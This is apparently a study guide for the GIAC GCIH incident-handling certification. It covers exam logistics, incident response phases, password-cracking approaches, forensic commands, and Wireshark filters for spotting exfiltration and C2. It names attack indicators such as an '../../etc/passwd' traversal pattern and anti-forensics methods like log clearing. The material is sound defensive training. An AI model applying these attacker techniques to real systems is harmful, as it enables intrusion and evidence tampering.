What is the GCIH certification?
The GCIH (GIAC Certified Incident Handler) validates skills in detecting, responding to, and resolving computer security incidents. It is based on SANS Institute's SEC504 course (Hacker Tools, Techniques, and Incident Handling) and covers incident response phases, common attacker techniques, and countermeasures. The exam is 4 hours with 106-115 questions and requires a passing score of 73%.
The GIAC Certified Incident Handler (GCIH) from the SANS Institute is one of the most respected incident response certifications in the cybersecurity industry. Based on the SANS SEC504 course, it covers both offensive and defensive concepts -- understanding how attackers operate is essential for effective incident response.
GCIH is recognized across government, finance, healthcare, and critical infrastructure sectors. SANS certifications are widely considered the most technically rigorous in the industry. The exam costs $949 USD (standalone) and SEC504 course plus exam costs approximately $5,000-$7,000. Certification is valid for 4 years.
Certification Overview
| Detail | Information |
|---|---|
| Certification | GIAC Certified Incident Handler (GCIH) |
| Provider | GIAC (SANS Institute) |
| Based on Course | SANS SEC504: Hacker Tools, Techniques, and Incident Handling |
| Exam Duration | 4 hours |
| Number of Questions | 106-115 |
| Passing Score | 73% |
| Exam Cost | $949 USD (standalone) |
| Validity | 4 years |
| Practice Exams | 2 included with exam registration |
"GCIH preparation requires that you understand attack techniques in detail -- not just what they are but how they work mechanically. The exam is open book, but the questions are too time-pressured to look up answers for things you do not already understand deeply. Build your index carefully and know your material." -- GIAC certification community guidance
Core Topic Areas
Computer Crime Investigation and Incident Handling
Incident response lifecycle (PICERL):
- Preparation: Incident response plan, team roles, tools, communication procedures
- Identification: Detecting and classifying potential incidents
- Containment: Limiting the scope and impact (short-term and long-term containment)
- Eradication: Removing the threat from the environment
- Recovery: Restoring systems and returning to normal operations
- Lessons Learned: Post-incident review and improvement
Legal and compliance considerations:
- Chain of custody for forensic evidence
- Legal search and seizure requirements
- Computer Fraud and Abuse Act (CFAA) and international equivalents
- Evidence preservation techniques
Scanning, Enumeration, and Vulnerability Discovery
Understanding how attackers identify targets and gather information is fundamental to incident response -- you need to recognize attack patterns in logs and network captures.
Attacker tools used in reconnaissance:
- Nmap: Port scanning, service version detection, OS fingerprinting
- Masscan: High-speed network scanning
- Shodan API: Programmatic access to Shodan data for target discovery
- Recon-ng: Modular OSINT framework
Detection of scanning activity:
| Scan Type | Detection Indicator |
|---|---|
| TCP SYN scan | Many SYN packets without completing handshakes |
| UDP scan | ICMP port unreachable responses to many UDP probes |
| Slow scan | Low-frequency connection attempts over long time periods |
| Decoy scan | Same port probed from multiple source IPs simultaneously |
Password Attacks and Defense
Password Attack Techniques
Password cracking approaches:
- Offline dictionary attack: Using a wordlist against captured password hashes
- Rule-based attacks: Applying transformation rules to wordlist entries (capitalize first letter, append numbers)
- Hybrid attack: Combining dictionary words with brute-force appended characters
- Rainbow table attack: Looking up precomputed hash-to-plaintext mappings
Common password hashing algorithms by security:
| Algorithm | Strength | Notes |
|---|---|---|
| MD5 (unsalted) | Very weak | Trivially cracked; never use for passwords |
| SHA-1 (unsalted) | Weak | Too fast; precomputed tables exist |
| NTLM | Weak | Windows legacy; fast to crack |
| bcrypt | Strong | Intentionally slow; salted by design |
| Argon2id | Very strong | NIST recommended for password hashing |
Defensive Countermeasures
- Account lockout policies: Lock after 3-5 failed attempts to prevent online brute force
- MFA: Makes password cracking alone insufficient for account compromise
- Privileged Access Workstations (PAW): Dedicated hardened workstations for administrative access
- Credential monitoring: Checking if organizational credentials appear in breach databases
Incident Response Tools
Memory and Disk Forensics
Memory forensics with Volatility:
vol.py -f memory.dmp --profile=Win10x64 pslist # List processes
vol.py -f memory.dmp --profile=Win10x64 cmdline # Process command lines
vol.py -f memory.dmp --profile=Win10x64 netscan # Network connections
vol.py -f memory.dmp --profile=Win10x64 malfind # Find injected code
vol.py -f memory.dmp --profile=Win10x64 dumpfiles -D /output/ # Extract files
Disk forensics tools:
- Autopsy: GUI-based digital forensics platform
- The Sleuth Kit: Command-line forensics toolkit
- FTK Imager: Disk imaging and evidence acquisition
- dd/dc3dd: Linux command-line disk imaging
Network Forensics
Wireshark filters for incident investigation:
# Suspicious DNS queries (long subdomains indicate C2 tunneling)
dns.qry.name.len > 50
# Large data transfers (possible exfiltration)
tcp.len > 1000 and ip.dst != <known_corporate_ip>
# Beaconing (regular connection intervals indicate C2)
ip.src == <suspicious_ip> and http
# Pass-the-hash indicators (NTLM authentication to many hosts)
ntlmssp.auth.username and ip.dst
Attacker Techniques and Countermeasures
Web Application Attacks
| Attack | How It Works | Detection Method |
|---|---|---|
| SQL Injection | Inserting SQL code in input fields | Web application firewall logs; anomalous database queries |
| XSS | Injecting scripts executed by victim's browser | Reflected: unusual parameters in URLs; Stored: suspicious content in database |
| Command Injection | Executing OS commands through web app | System calls from web server process; anomalous child processes |
| File Inclusion | Including local or remote files via path traversal | Access to ../../etc/passwd or similar patterns in URL |
| SSRF | Forcing server to make requests on attacker's behalf | Outbound requests from server to internal/cloud metadata services |
Malware and Evasion Techniques
Anti-forensics techniques attackers use:
- Timestomping: Modifying file timestamps to confuse forensics timelines
- Log clearing: Deleting Windows event logs and Linux logs
- Living off the land (LOLBAS/GTFOBINS): Using legitimate system tools for malicious purposes to evade EDR
- Encryption: Encrypting C2 communication to evade network inspection
- Process injection: Hiding malicious code inside legitimate processes (svchost, explorer.exe)
"The GCIH exam specifically tests whether you can recognize the artifacts left by common attacker tools in logs, network captures, and memory. For every technique in the course, you should know: how the attack works, what tools are commonly used to execute it, and what evidence it leaves behind in each data source." -- SANS SEC504 community study guidance
Frequently Asked Questions
Is GCIH open book? Yes, the GCIH exam is open book. You can bring printed materials to the testing center. However, open book does not mean easy -- the questions are scenario-based and time-pressured. Most candidates bring a custom index of key concepts, tool syntax, and attack/defense pairings. The index itself becomes a study tool because creating it forces you to organize your knowledge.
How does GCIH compare to CySA+? GCIH and CySA+ both cover incident response and security operations, but at different depths. CySA+ is vendor-neutral and covers a broader range of security operations topics at moderate depth. GCIH is more technically specific, covering attacker tools and techniques in greater detail, and has a reputation as a more challenging and respected certification. Many incident response professionals pursue both to validate breadth (CySA+) and depth (GCIH).
What is the SANS SEC504 course like? SEC504 is a 6-day intensive course typically delivered at SANS training events (live, in-person) or as an on-demand online course. The course uses hands-on exercises throughout, covering each attack technique and the corresponding detection and response methodology. The final two days include a comprehensive capstone exercise applying all learned skills to a realistic incident response scenario.
References
- GIAC. (2025). GCIH Certification. https://www.giac.org/certifications/certified-incident-handler-gcih/
- SANS Institute. (2025). SEC504: Hacker Tools, Techniques, and Incident Handling. https://www.sans.org/cyber-security-courses/hacker-techniques-incident-handling/
- Cichonski, P., Millar, T., Grance, T., & Scarfone, K. (2012). NIST SP 800-61r2: Computer Security Incident Handling Guide. https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final
- MITRE ATT&CK. (2025). Enterprise Tactics and Techniques. https://attack.mitre.org/
- Volatility Foundation. (2025). Volatility Memory Forensics Framework. https://www.volatilityfoundation.org/
- Luttgens, J., Pepe, M., & Mandia, K. (2014). Incident Response and Computer Forensics, 3rd Edition. McGraw-Hill.